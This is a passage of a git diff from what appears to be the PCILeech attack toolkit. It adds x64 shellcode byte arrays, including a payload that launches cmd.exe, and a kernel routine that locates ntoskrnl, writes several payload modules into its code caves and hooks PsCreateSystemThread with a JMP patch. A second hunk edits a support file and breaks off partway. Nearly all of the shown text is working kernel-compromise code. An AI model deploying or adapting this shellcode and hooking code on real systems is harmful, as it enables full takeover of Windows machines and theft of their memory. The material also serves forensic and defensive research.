+ 0x73, 0x5c, 0x73, 0xc7, 0x44, 0x24, 0x3c, 0x79, 0x73, 0x74, 0x65, 0xc7,
+ 0x44, 0x24, 0x40, 0x6d, 0x33, 0x32, 0x5c, 0xc7, 0x44, 0x24, 0x44, 0x63,
+ 0x6d, 0x64, 0x2e, 0xc7, 0x44, 0x24, 0x48, 0x65, 0x78, 0x65, 0x00, 0x48,
+ 0xc7, 0x83, 0x28, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xe8, 0x21,
+ 0xfb, 0xff, 0xff, 0x48, 0x63, 0xc8, 0x48, 0x89, 0x8b, 0x20, 0x02, 0x00,
+ 0x00, 0x85, 0xc0, 0x74, 0x0d, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00,
+ 0x01, 0x01, 0x00, 0x00, 0xeb, 0x26, 0x48, 0x8d, 0x8b, 0x00, 0x04, 0x00,
+ 0x00, 0x41, 0xb8, 0x1c, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30,
+ 0xff, 0x55, 0x40, 0x4c, 0x8d, 0x44, 0x24, 0x50, 0x48, 0x8b, 0xcb, 0x48,
+ 0x8d, 0x55, 0xe0, 0xe8, 0x98, 0xf8, 0xff, 0xff, 0x48, 0x8b, 0x9c, 0x24,
+ 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x01, 0x00, 0x00, 0x5d,
+ 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x8b, 0xc2, 0x4c, 0x8d,
+ 0x44, 0x24, 0x30, 0x48, 0x69, 0xd0, 0xf0, 0xd8, 0xff, 0xff, 0x4c, 0x8b,
+ 0xc9, 0x33, 0xc9, 0x48, 0x89, 0x54, 0x24, 0x30, 0x33, 0xd2, 0x41, 0xff,
+ 0x51, 0x20, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
+ 0x89, 0x70, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90,
+ 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b,
+ 0xd7, 0xc7, 0x45, 0xeb, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8,
+ 0x00, 0x00, 0x00, 0xc7, 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d,
+ 0x75, 0x4b, 0xc7, 0x45, 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00,
+ 0x00, 0x00, 0xc7, 0x45, 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb,
+ 0xce, 0xad, 0x90, 0x4d, 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7,
+ 0x45, 0x03, 0x8f, 0xb5, 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd,
+ 0x05, 0xc7, 0x45, 0x0b, 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9,
+ 0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45,
+ 0x17, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8,
+ 0xc7, 0x45, 0x1f, 0x3d, 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0,
+ 0x35, 0x30, 0xc7, 0x45, 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b,
+ 0x61, 0x4c, 0x04, 0x5d, 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7,
+ 0x45, 0x33, 0xb8, 0xd4, 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0,
+ 0x6f, 0xc7, 0x45, 0x3b, 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde,
+ 0x24, 0xe6, 0xf7, 0xc7, 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45,
+ 0x47, 0x36, 0x31, 0x0e, 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce,
+ 0x8b, 0x16, 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48,
+ 0x89, 0x07, 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90,
+ 0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
+ 0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9,
+ 0x74, 0x7a, 0xb8, 0x4d, 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70,
+ 0x48, 0x63, 0x41, 0x3c, 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50,
+ 0x45, 0x00, 0x00, 0x75, 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
+ 0x03, 0xd1, 0x74, 0x54, 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74,
+ 0x4b, 0x8b, 0x42, 0x20, 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c,
+ 0x8d, 0x0c, 0x01, 0x8b, 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9,
+ 0x45, 0x33, 0xc0, 0x45, 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c,
+ 0x03, 0xd1, 0x33, 0xdb, 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2,
+ 0xc1, 0xcb, 0x0d, 0x03, 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee,
+ 0x3b, 0xdd, 0x74, 0x23, 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45,
+ 0x3b, 0xc3, 0x72, 0xd4, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48,
+ 0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c,
+ 0x24, 0x20, 0xc3, 0x46, 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14,
+ 0x73, 0xde, 0x42, 0x8b, 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7
+ };
+ *ppb = WINX64_PSCMD_KERNEL_BIN;
+ *pcb = sizeof(WINX64_PSCMD_KERNEL_BIN);
+}
+
+// standard wx64_exec_user payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC wx64_exec_user_c.c
+// ml64 wx64_exec_user.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_exec_user_c.obj
+// shellcode64.exe -o wx64_exec_user.exe
+// xxd -i wx64_exec_user.bin
+VOID GetData_PSCMD_USER(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_PSCMD_USER_BIN[] = {
+ 0xb0, 0x00, 0xb2, 0x01, 0x48, 0x8d, 0x0d, 0x49, 0x00, 0x00, 0x00, 0xf0,
+ 0x0f, 0xb0, 0x11, 0x75, 0x42, 0x48, 0x8d, 0x0d, 0xe8, 0xff, 0xff, 0xff,
+ 0x48, 0x81, 0xe1, 0x00, 0xf0, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x14, 0x25,
+ 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18,
+ 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x12, 0x48, 0x8b, 0x12, 0x48, 0x8b,
+ 0x52, 0x20, 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83,
+ 0xec, 0x20, 0xe8, 0xe1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
+ 0x00, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+ 0x24, 0x10, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x48, 0x63, 0x41, 0x3c, 0x4c,
+ 0x8b, 0xc9, 0x8b, 0xf2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00,
+ 0x4c, 0x03, 0xc1, 0x45, 0x8b, 0x50, 0x20, 0x45, 0x8b, 0x58, 0x24, 0x4c,
+ 0x03, 0xd1, 0x41, 0x8b, 0x58, 0x1c, 0x4c, 0x03, 0xd9, 0x41, 0x8b, 0x78,
+ 0x18, 0x48, 0x03, 0xd9, 0x33, 0xc9, 0x85, 0xff, 0x74, 0x2d, 0x41, 0x8b,
+ 0x12, 0x49, 0x03, 0xd1, 0x45, 0x33, 0xc0, 0xeb, 0x0d, 0x0f, 0xb6, 0xc0,
+ 0x48, 0xff, 0xc2, 0x41, 0xc1, 0xc8, 0x0d, 0x44, 0x03, 0xc0, 0x8a, 0x02,
+ 0x84, 0xc0, 0x75, 0xed, 0x44, 0x3b, 0xc6, 0x74, 0x1c, 0xff, 0xc1, 0x49,
+ 0x83, 0xc2, 0x04, 0x3b, 0xcf, 0x72, 0xd3, 0x33, 0xc0, 0x48, 0x8b, 0x5c,
+ 0x24, 0x08, 0x48, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x8b, 0x7c, 0x24, 0x18,
+ 0xc3, 0x41, 0x0f, 0xb7, 0x0c, 0x4b, 0x8b, 0x04, 0x8b, 0x49, 0x03, 0xc1,
+ 0xeb, 0xe3, 0xcc, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
+ 0x41, 0x78, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89, 0x08, 0x39, 0x8b,
+ 0x88, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x88, 0x00, 0x00, 0x00,
+ 0x48, 0x8b, 0x4b, 0x58, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x50, 0xff,
+ 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b,
+ 0x68, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x43, 0x70, 0x48, 0xb9, 0xac, 0xda,
+ 0x37, 0x13, 0x00, 0x22, 0xda, 0xfe, 0x48, 0x89, 0x08, 0x48, 0x8b, 0x43,
+ 0x78, 0x48, 0x89, 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc,
+ 0x40, 0x53, 0x48, 0x83, 0xec, 0x70, 0xba, 0x68, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xd9, 0x8d, 0x4a, 0xd8, 0xff, 0x53, 0x30, 0xc7, 0x00, 0x68, 0x00,
+ 0x00, 0x00, 0xc7, 0x40, 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13,
+ 0x48, 0x83, 0xba, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b,
+ 0x4b, 0x60, 0x48, 0x89, 0x48, 0x58, 0x48, 0x8b, 0x4b, 0x68, 0x48, 0x89,
+ 0x48, 0x50, 0x48, 0x8b, 0x4b, 0x60, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b,
+ 0x13, 0x48, 0x8d, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x4c, 0x24, 0x48, 0x45,
+ 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x83,
+ 0x64, 0x24, 0x38, 0x00, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00,
+ 0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44,
+ 0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff, 0x53, 0x18, 0x85, 0xc0, 0x74,
+ 0x26, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x8b, 0x80, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff, 0x53, 0x08, 0xb8, 0x01,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xe9, 0xc7,
+ 0x40, 0xc8, 0xfb, 0x97, 0xfd, 0x0f, 0xc7, 0x40, 0xcc, 0x80, 0x8f, 0x0c,
+ 0x17, 0x48, 0x8d, 0x7a, 0x48, 0xc7, 0x40, 0xd0, 0x72, 0xfe, 0xb3, 0x16,
+ 0x48, 0x8d, 0x70, 0xec, 0xc7, 0x40, 0xd4, 0x6b, 0xd0, 0x2b, 0xca, 0xbb,
+ 0x09, 0x00, 0x00, 0x00, 0xc7, 0x40, 0xd8, 0x74, 0xab, 0x30, 0xac, 0xc7,
+ 0x40, 0xdc, 0xfa, 0x97, 0x02, 0x4c, 0xc7, 0x40, 0xe0, 0x16, 0x65, 0xfa,
+ 0x10, 0xc7, 0x40, 0xe4, 0xb0, 0x49, 0x2d, 0xdb, 0xc7, 0x40, 0xe8, 0x1f,
+ 0x79, 0x0a, 0xe8, 0x48, 0x8d, 0x76, 0xfc, 0x48, 0x8b, 0xcd, 0x8b, 0x16,
+ 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0xeb, 0xfd, 0xff, 0xff, 0x48, 0x89, 0x07,
+ 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b,
+ 0x6c, 0x24, 0x68, 0x48, 0x8b, 0x74, 0x24, 0x70, 0x48, 0x83, 0xc4, 0x50,
+ 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0xc1, 0x48,
+ 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x80, 0x00, 0x00, 0x00, 0xff,
+ 0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f, 0x81, 0x7c, 0x24, 0x30,
+ 0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x8b,
+ 0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00, 0xbe, 0x00,
+ 0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5, 0xff, 0xff, 0xff, 0x85,
+ 0xc0, 0x0f, 0x84, 0x96, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x43, 0x70, 0x4c,
+ 0x8b, 0x4b, 0x78, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10,
+ 0x41, 0x8b, 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2,
+ 0xff, 0x07, 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x58,
+ 0x77, 0x08, 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33,
+ 0xc0, 0x49, 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0xff, 0x53, 0x38, 0x85, 0xc0, 0x74, 0x4d, 0x48, 0x8b, 0x4b, 0x78,
+ 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83, 0xbb,
+ 0x88, 0x00, 0x00, 0x00, 0x00, 0x74, 0x36, 0x48, 0x8b, 0xcb, 0xe8, 0x35,
+ 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x1d, 0xb9, 0x0a, 0x00, 0x00, 0x00,
+ 0xff, 0x53, 0x40, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x8b, 0x43, 0x70, 0x48,
+ 0x8b, 0x49, 0x08, 0x48, 0x2b, 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xce,
+ 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x5a, 0xff, 0xff,
+ 0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x5b, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c,
+ 0x24, 0x48, 0x48, 0x83, 0xc4, 0x30, 0x5e, 0xc3, 0x40, 0x53, 0x48, 0x83,
+ 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9,
+ 0x74, 0x78, 0x48, 0x8b, 0xcb, 0xe8, 0xda, 0xfe, 0xff, 0xff, 0x85, 0xc0,
+ 0x74, 0x6c, 0x48, 0x8b, 0x53, 0x78, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x8b,
+ 0x42, 0x10, 0x48, 0x39, 0x41, 0x08, 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00,
+ 0x00, 0xff, 0x53, 0x40, 0xeb, 0x47, 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d,
+ 0x51, 0x68, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0x48, 0x8b, 0x4b, 0x50, 0x25, 0xff, 0x07, 0x00, 0x00, 0x41, 0x81,
+ 0xe0, 0xff, 0x07, 0x00, 0x00, 0x48, 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72,
+ 0x06, 0x41, 0xb8, 0x00, 0x08, 0x00, 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53,
+ 0x48, 0x85, 0xc0, 0x74, 0x15, 0x48, 0x8b, 0x4b, 0x78, 0x8b, 0x44, 0x24,
+ 0x40, 0x48, 0x01, 0x41, 0x10, 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00,
+ 0x75, 0x88, 0x48, 0x8b, 0xcb, 0xe8, 0xbe, 0xfc, 0xff, 0xff, 0x48, 0x83,
+ 0xc4, 0x30, 0x5b, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+ 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+ 0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0xe8, 0x06, 0xfc,
+ 0xff, 0xff, 0xba, 0x90, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0xb0, 0xff, 0xd0,
+ 0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x89,
+ 0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf, 0xe8, 0x83, 0xfd, 0xff,
+ 0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x7b, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24,
+ 0x30, 0xc7, 0x44, 0x24, 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21,
+ 0x95, 0xef, 0xdf, 0x32, 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00,
+ 0xbb, 0x00, 0x08, 0x00, 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb,
+ 0x48, 0x8b, 0x06, 0x48, 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89,
+ 0x4e, 0x70, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00,
+ 0x10, 0x00, 0x00, 0x48, 0x89, 0x46, 0x78, 0x48, 0x89, 0x11, 0x48, 0x8d,
+ 0x4e, 0x68, 0x48, 0x8b, 0x46, 0x78, 0x48, 0x89, 0x10, 0x48, 0x8d, 0x56,
+ 0x50, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56, 0x60, 0x44, 0x8b, 0xcb, 0x48,
+ 0x8d, 0x4e, 0x58, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xff, 0x56, 0x10, 0x89,
+ 0xbe, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0xfc, 0xff,
+ 0xff, 0x85, 0xc0, 0x75, 0x0a, 0x48, 0x8b, 0xce, 0xe8, 0xd7, 0xfb, 0xff,
+ 0xff, 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00,
+ 0x00, 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d,
+ 0x05, 0x6b, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b,
+ 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24,
+ 0x28, 0x00, 0x4c, 0x8d, 0x05, 0x77, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24,
+ 0x20, 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20,
+ 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83,
+ 0xc4, 0x50, 0x5f, 0xc3
+ };
+ *ppb = WINX64_PSCMD_USER_BIN;
+ *pcb = sizeof(WINX64_PSCMD_USER_BIN);
+}
+
+// ----------------------------------------------------------------------------
+// CORE LOGIC/MASTER FUNCTIONALITY BELOW:
+// ----------------------------------------------------------------------------
+
+#define H_PsCreateSystemThread 0x94a06b02
+VOID c_EntryPoint(PKMDDATA pk)
+{
+ PBYTE pbData;
+ DWORD cbData;
+ QWORD hModuleNTOSKRNL, hPsCreateSystemThread, hHookFn, hHook;
+ QWORD hKMD, hVFS, hPSCMD_KERNEL, hPSCMD_USER;
+ DWORD dwOffsetRET = 0, dwOffsetJMP;
+ // locate ntoskrnl.exe
+ hModuleNTOSKRNL = FindNtoskrnl();
+ if(!hModuleNTOSKRNL) {
+ pk->dataOut[0] = 0xf0000001;
+ return;
+ }
+ pk->dataOut[1] = hModuleNTOSKRNL;
+ // locate hook function - PsCreateSystemThreadEx
+ hPsCreateSystemThread = PEGetProcAddressH(hModuleNTOSKRNL, H_PsCreateSystemThread);
+ if(!hPsCreateSystemThread) {
+ pk->dataOut[0] = 0xf0000002;
+ return;
+ }
+ hHookFn = hPsCreateSystemThread;
+ pk->dataOut[2] = hHookFn;
+ // hook : locate, but do not patch yet.
+ while(TRUE) {
+ if((*(PBYTE)(hHookFn + dwOffsetRET) == 0xC3 /* RET */) && (*(PDWORD)(hHookFn + dwOffsetRET + 1) == 0xCCCCCCCC /* PAD */)) {
+ break;
+ }
+ if(dwOffsetRET == 0x100) {
+ pk->dataOut[0] = 0xf0000003;
+ return;
+ }
+ dwOffsetRET++;
+ }
+ hHook = hHookFn + dwOffsetRET;
+ // code cave : locate and patch in VFS (virtual file system) module.
+ GetData_VFS(&pbData, &cbData);
+ hVFS = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hVFS) {
+ pk->dataOut[0] = 0xf0000004;
+ return;
+ }
+ pk->dataOut[3] = hVFS;
+ CopyMem((PVOID)hVFS, (PVOID)pbData, cbData);
+ // code cave : locate and patch in KMD (windows pcileech kernel module).
+ GetData_KMD(&pbData, &cbData);
+ hKMD = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hKMD) {
+ pk->dataOut[0] = 0xf0000005;
+ return;
+ }
+ pk->dataOut[4] = hKMD;
+ CopyMem((PVOID)hKMD, (PVOID)pbData, cbData);
+ // code cave : locate and patch in pscmd kernelmode code.
+ GetData_PSCMD_KERNEL(&pbData, &cbData);
+ hPSCMD_KERNEL = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hPSCMD_KERNEL) {
+ pk->dataOut[0] = 0xf0000006;
+ return;
+ }
+ pk->dataOut[5] = hPSCMD_KERNEL;
+ CopyMem((PVOID)hPSCMD_KERNEL, (PVOID)pbData, cbData);
+ // code cave : locate and patch in pscmd usermode code.
+ GetData_PSCMD_USER(&pbData, &cbData);
+ hPSCMD_USER = FindCodeCave(hModuleNTOSKRNL, cbData);
+ if(!hPSCMD_USER) {
+ pk->dataOut[0] = 0xf0000006;
+ return;
+ }
+ pk->dataOut[6] = hPSCMD_USER;
+ CopyMem((PVOID)hPSCMD_USER, (PVOID)pbData, cbData);
+ // patch in offsets in KMD code
+ *(PWORD)(hKMD + 0x02) = pk->dataIn[0] ? (WORD)pk->dataIn[0] : 0x0045;
+ *(PDWORD)(hKMD + 0x04) = (DWORD)hModuleNTOSKRNL;
+ *(PDWORD)(hKMD + 0x08) = (DWORD)hKMD;
+ *(PDWORD)(hKMD + 0x0C) = (DWORD)hVFS;
+ *(PDWORD)(hKMD + 0x10) = (DWORD)hPSCMD_KERNEL;
+ *(PDWORD)(hKMD + 0x14) = (DWORD)hPSCMD_USER;
+ // hook function by patching RET instruction
+ dwOffsetJMP = (DWORD)hKMD - ((DWORD)hHook + 5);
+ *(PBYTE)(hHook) = 0xE9; // JMP
+ *(PDWORD)(hHook + 1) = dwOffsetJMP; // JMP ADDR
+}
diff --git a/pcileech_shellcode/wx64_common.c b/pcileech_shellcode/wx64_common.c
index 39eacc2..5ab0e57 100644
--- a/pcileech_shellcode/wx64_common.c
+++ b/pcileech_shellcode/wx64_common.c
@@ -1,7 +1,7 @@
// wx64_common.c : support functions used by Windows x64 KMDs started by stage3 EXEC.
// Compatible with Windows x64.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
@@ -70,36 +70,35 @@ QWORD KernelGetModuleBase(_In_ PKERNEL_FUNCTIONS fnk, _In_ LPSTR szModuleName)
VOID InitializeKernelFunctions(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS fnk)
{
- QWORD FUNC2[][2] = {
- { &fnk->_stricmp, H__stricmp },
- { &fnk->ExAllocatePool, H_ExAllocatePool },
- { &fnk->ExFreePool, H_ExFreePool },
- { &fnk->IoCreateDriver, H_IoCreateDriver },
- { &fnk->KeDelayExecutionThread, H_KeDelayExecutionThread },
- { &fnk->KeGetCurrentIrql, H_KeGetCurrentIrql },
- { &fnk->MmGetPhysicalAddress, H_MmGetPhysicalAddress },
- { &fnk->MmLoadSystemImage, H_MmLoadSystemImage },
- { &fnk->MmMapIoSpace, H_MmMapIoSpace },
- { &fnk->MmUnloadSystemImage, H_MmUnloadSystemImage },
- { &fnk->MmUnmapIoSpace, H_MmUnmapIoSpace },
- { &fnk->RtlAnsiStringToUnicodeString, H_RtlAnsiStringToUnicodeString },
- { &fnk->RtlCopyMemory, H_RtlCopyMemory },
- { &fnk->RtlFreeUnicodeString, H_RtlFreeUnicodeString },
- { &fnk->RtlInitAnsiString, H_RtlInitAnsiString },
- { &fnk->RtlInitUnicodeString, H_RtlInitUnicodeString },
- { &fnk->RtlInitUnicodeString, H_RtlInitUnicodeString },
- { &fnk->RtlZeroMemory, H_RtlZeroMemory },
- { &fnk->ZwClose, H_ZwClose },
- { &fnk->ZwCreateFile, H_ZwCreateFile },
- { &fnk->ZwOpenFile, H_ZwOpenFile },
- { &fnk->ZwReadFile, H_ZwReadFile },
- { &fnk->ZwQueryDirectoryFile, H_ZwQueryDirectoryFile },
- { &fnk->ZwQuerySystemInformation, H_ZwQuerySystemInformation },
- { &fnk->ZwSetSystemInformation, H_ZwSetSystemInformation },
- { &fnk->ZwWriteFile, H_ZwWriteFile }
- };
- for(QWORD j = 0; j < (sizeof(FUNC2) / sizeof(QWORD[2])); j++) {
- *(PQWORD)FUNC2[j][0] = PEGetProcAddressH(qwNtosBase, (DWORD)FUNC2[j][1]);
